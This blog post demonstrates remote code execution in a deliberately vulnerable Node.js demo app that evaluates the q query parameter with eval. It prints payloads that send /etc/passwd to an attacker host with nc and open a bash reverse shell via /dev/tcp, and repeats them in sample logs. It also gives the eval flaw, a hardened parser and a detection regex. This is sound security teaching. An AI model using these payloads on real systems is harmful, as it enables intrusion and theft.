Nodejs and a simple RCE exploit
Riyaz Walikar
Published in Appsecco
Aug 24, 2016
While reading the blog post on an RCE on demo.paypal.com by @artsploit, I wanted to build a simple Node.js app that I could use to demo remote code execution.
I built a simple app that is vulnerable to command injection/execution because it passes user input straight to eval: whatever is supplied in the q parameter is evaluated as JavaScript inside the server process. A simple exploit could be the following (output shown in the article header image):
/?q=require('child_process').exec('cat+/etc/passwd+|+nc+attackerip+80')
This will send the contents of /etc/passwd to a netcat listener running on a machine you control that is reachable from the Node.js server.
A quick reverse shell can also be obtained using:
/?q=require('child_process').exec('bash+-c+"bash+-i+>%26+/dev/tcp/nc_host/nc_port+0>%261"')
This will send a reverse shell back to your listener and you get a proper interactive shell.
Image: reverse shell obtained to a netcat listener
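To make the root cause concrete, here is an added example (my own code, not the appsecco/node-simple-rce app): the eval-based request handler the post describes, next to a hardened replacement, plus a small log check that flags requests whose q parameter carries code rather than the arithmetic the feature was meant to take. The assumption that the app's intended job is to evaluate a small arithmetic expression is mine; the sample log lines are constructed.

```javascript
// Added example, not the original app's code. Assumption: the feature behind
// /?q= is meant to evaluate a small arithmetic expression.

// --- Vulnerable pattern: untrusted input reaches eval ---
// Anything a user can express in JavaScript runs inside the server process,
// which is how the post's payload reaches require('child_process').
function vulnerableHandler(q) {
  return eval(q); // the bug: the request string is executed as code
}

// --- Hardened pattern: parse only the grammar the feature needs ---
// A recursive-descent parser for decimal numbers, + - * / and parentheses.
// Any other character is rejected up front, so there is no path to code.
function safeArithmetic(src) {
  if (typeof src !== 'string') throw new Error('rejected: not a string');
  const pieces = src.match(/\s*(\d+(?:\.\d+)?|[-+*/()])\s*/g);
  if (!pieces || pieces.join('') !== src) {
    throw new Error('rejected: not an arithmetic expression');
  }
  const toks = pieces.map((t) => t.trim());
  let pos = 0;
  const peek = () => toks[pos];
  const next = () => toks[pos++];

  function factor() {
    const t = next();
    if (t === '(') {
      const v = expr();
      if (next() !== ')') throw new Error('rejected: unbalanced parenthesis');
      return v;
    }
    if (t === '-') return -factor();
    if (t === undefined || !/^\d/.test(t)) throw new Error('rejected: unexpected token ' + t);
    return Number(t);
  }
  function term() {
    let v = factor();
    while (peek() === '*' || peek() === '/') {
      const op = next();
      const r = factor();
      if (op === '/' && r === 0) throw new Error('rejected: division by zero');
      v = op === '*' ? v * r : v / r;
    }
    return v;
  }
  function expr() {
    let v = term();
    while (peek() === '+' || peek() === '-') {
      v = next() === '+' ? v + term() : v - term();
    }
    return v;
  }

  const value = expr();
  if (pos !== toks.length) throw new Error('rejected: trailing input');
  return value;
}

// Drop-in replacement for the handler: never throws, never executes input.
function hardenedHandler(q) {
  try {
    return { ok: true, value: safeArithmetic(q) };
  } catch (e) {
    return { ok: false, error: e.message };
  }
}

// --- Detection: flag requests whose q parameter looks like code ---
// Matches the building blocks of the payloads shown in the post.
const SUSPICIOUS = /require\s*\(|child_process|\/dev\/tcp|\bexec\s*\(/i;

function flagSuspiciousRequests(logLines) {
  const flagged = [];
  for (const line of logLines) {
    const m = line.match(/[?&]q=([^ &]*)/);
    if (!m) continue;
    let q;
    try {
      q = decodeURIComponent(m[1].replace(/\+/g, ' ')); // '+' is a space in a query string
    } catch (e) {
      q = m[1];
    }
    if (SUSPICIOUS.test(q)) flagged.push({ line, q });
  }
  return flagged;
}

// Constructed access-log lines: one benign request, two carrying the post's payloads.
const SAMPLE_LOG = [
  '10.0.0.5 - - [24/Aug/2016:10:00:01 +0000] "GET /?q=2*(3%2B4) HTTP/1.1" 200 3',
  '10.0.0.9 - - [24/Aug/2016:10:00:07 +0000] "GET /?q=require(\'child_process\').exec(\'cat+/etc/passwd+|+nc+attackerip+80\') HTTP/1.1" 200 0',
  '10.0.0.9 - - [24/Aug/2016:10:00:09 +0000] "GET /?q=require(\'child_process\').exec(\'bash+-c+"bash+-i+>%26+/dev/tcp/nc_host/nc_port+0>%261"\') HTTP/1.1" 200 0',
];

if (typeof module !== 'undefined') {
  module.exports = { vulnerableHandler, safeArithmetic, hardenedHandler, flagSuspiciousRequests, SAMPLE_LOG };
}
```

The point of the hardened version is not a blocklist of dangerous words: the parser simply has no production for identifiers or calls, so the only things it can ever do are the arithmetic operations the feature needs. The regex in flagSuspiciousRequests is the complementary detection side, useful for sweeping existing access logs of an app like this one for the payload shapes the post demonstrates.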
Full details of the code and exploit are available here. The app is also available as a Docker image. To set it up and run it, use:
docker run -p 8080:8080 -d appsecco/node-simple-rce
And, as with other cool things in the world, the code is available on GitHub as well.
Happy hacking!!